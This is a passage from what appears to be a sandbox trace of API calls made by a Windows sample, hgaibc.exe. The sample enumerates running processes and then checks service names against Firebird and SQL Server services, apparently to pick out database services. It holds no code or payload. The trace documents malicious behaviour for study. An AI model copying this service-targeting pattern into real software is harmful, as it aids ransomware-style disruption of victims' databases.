cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.937] lstrlenW (lpString="services.exe") returned 12 [0161.937] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.938] lstrlenW (lpString="lsass.exe") returned 9 [0161.938] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0161.939] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0161.939] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0161.947] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0161.947] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.948] lstrlenW (lpString="svchost.exe") returned 11 [0161.948] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.949] lstrlenW (lpString="svchost.exe") returned 11 [0161.949] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.950] lstrlenW (lpString="dwm.exe") returned 7 [0161.950] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.951] lstrlenW (lpString="svchost.exe") returned 11 [0161.951] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.952] lstrlenW (lpString="svchost.exe") returned 11 [0161.952] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.953] lstrlenW (lpString="svchost.exe") returned 11 [0161.953] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.954] lstrlenW (lpString="svchost.exe") returned 11 [0161.954] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.955] lstrlenW (lpString="svchost.exe") returned 11 [0161.955] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.956] lstrlenW (lpString="svchost.exe") returned 11 [0161.956] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.957] lstrlenW (lpString="svchost.exe") returned 11 [0161.957] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.958] lstrlenW (lpString="svchost.exe") returned 11 [0161.958] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.959] lstrlenW (lpString="svchost.exe") returned 11 [0161.959] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.960] lstrlenW (lpString="svchost.exe") returned 11 [0161.960] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.018] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.018] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.019] lstrlenW (lpString="svchost.exe") returned 11 [0162.019] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.020] lstrlenW (lpString="audiodg.exe") returned 11 [0162.020] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0162.021] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0162.021] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0162.022] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0162.022] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0162.023] lstrlenW (lpString="Memory Compression") returned 18 [0162.023] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0162.024] lstrlenW (lpString="sihost.exe") returned 10 [0162.024] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.054] lstrlenW (lpString="svchost.exe") returned 11 [0162.054] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0162.055] lstrlenW (lpString="msoia.exe") returned 9 [0162.055] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0162.056] lstrlenW (lpString="taskhostw.exe") returned 13 [0162.057] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.058] lstrlenW (lpString="explorer.exe") returned 12 [0162.058] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0162.059] lstrlenW (lpString="SearchUI.exe") returned 12 [0162.059] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0162.060] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0162.060] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0162.061] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0162.061] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0162.062] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0162.062] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0162.063] lstrlenW (lpString="hgaibc.exe") returned 10 [0162.063] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0162.065] lstrlenW (lpString="cmd.exe") returned 7 [0162.065] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0162.066] lstrlenW (lpString="conhost.exe") returned 11 [0162.066] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0162.067] lstrlenW (lpString="mode.com") returned 8 [0162.067] Process32NextW (in: hSnapshot=0x524, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0162.068] CloseHandle (hObject=0x524) returned 1 [0162.068] Sleep (dwMilliseconds=0x1f4) [0162.719] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c358 [0162.720] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0162.720] GetLastError () returned 0xea [0162.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4591fc0 [0162.720] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4591fc0, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4591fc0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0162.721] CloseServiceHandle (hSCObject=0x458c358) returned 1 [0162.721] lstrlenW (lpString="Appinfo") returned 7 [0162.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0162.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0162.721] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0162.722] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0162.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0162.722] lstrlenW (lpString="AppXSvc") returned 7 [0162.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0162.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0162.722] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0162.722] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0162.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0162.722] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0162.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0162.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0162.722] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0162.722] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0162.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0162.722] lstrlenW (lpString="Audiosrv") returned 8 [0162.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0162.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0162.722] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0162.722] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0162.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0162.722] lstrlenW (lpString="BFE") returned 3 [0162.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0162.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0162.722] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0162.722] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0162.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0162.722] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0162.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0162.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0162.723] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0162.723] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0162.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0162.723] lstrlenW (lpString="CDPSvc") returned 6 [0162.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0162.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0162.723] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0162.723] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0162.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0162.723] lstrlenW (lpString="ClickToRunSvc") returned 13 [0162.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0162.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0162.723] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0162.723] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0162.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0162.723] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0162.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0162.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0162.723] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0162.723] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0162.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0162.723] lstrlenW (lpString="CryptSvc") returned 8 [0162.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0162.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0162.723] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0162.724] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0162.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0162.724] lstrlenW (lpString="DcomLaunch") returned 10 [0162.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0162.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0162.724] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0162.724] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0162.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0162.724] lstrlenW (lpString="DeviceAssociationService") returned 24 [0162.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0162.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0162.724] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0162.724] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0162.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0162.724] lstrlenW (lpString="Dhcp") returned 4 [0162.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0162.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0162.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0162.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0162.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0162.724] lstrlenW (lpString="Dnscache") returned 8 [0162.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0162.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0162.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0162.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0162.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0162.724] lstrlenW (lpString="DPS") returned 3 [0162.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0162.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0162.725] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0162.725] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0162.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0162.725] lstrlenW (lpString="DusmSvc") returned 7 [0162.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0162.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0162.725] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0162.725] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0162.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0162.725] lstrlenW (lpString="EventLog") returned 8 [0162.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0162.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0162.725] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0162.725] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0162.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0162.725] lstrlenW (lpString="EventSystem") returned 11 [0162.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0162.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0162.725] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0162.725] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0162.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0162.725] lstrlenW (lpString="FontCache") returned 9 [0162.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0162.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0162.726] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0162.726] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0162.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0162.726] lstrlenW (lpString="gpsvc") returned 5 [0162.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0162.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0162.726] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0162.726] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0162.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0162.726] lstrlenW (lpString="iphlpsvc") returned 8 [0162.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0162.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0162.726] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0162.726] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0162.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0162.726] lstrlenW (lpString="KeyIso") returned 6 [0162.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0162.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0162.902] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0162.902] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0162.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0162.903] lstrlenW (lpString="LanmanServer") returned 12 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0162.903] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0162.903] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0162.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0162.903] lstrlenW (lpString="LanmanWorkstation") returned 17 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0162.903] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0162.903] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0162.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0162.903] lstrlenW (lpString="lfsvc") returned 5 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0162.903] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0162.903] lstrcmpiW 